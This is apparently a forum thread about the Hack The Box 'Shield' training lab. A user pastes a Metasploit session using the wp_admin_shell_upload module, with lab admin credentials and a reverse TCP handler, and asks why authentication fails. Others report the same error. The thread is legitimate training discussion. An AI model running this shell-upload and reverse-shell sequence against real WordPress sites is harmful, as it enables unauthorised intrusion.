Starting Point: Shield

Hi all: I’m stuck with that machine.

I am not able to login in the wordpress server, neither via web nor using metasploit:

msf5 exploit(unix/webapp/wp_admin_shell_upload) > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
PASSWORD => P@s5w0rd!
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run

[] Started reverse TCP handler on
] Authenticating with WordPress using admin:P@s5w0rd!..
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress

I know that the user exists, because I can try to ‘recover password’ and it doesn’t fail, but the password seems to be wrong.


What am I doing wrong?

i have the same problem

Im getting the same issue with knowledge check in HTB course.

Exploit aborted due to failure: no-access: [ip address]:80 - Authentication failed

what causes this to happen? is there a way to make metasploit verbose?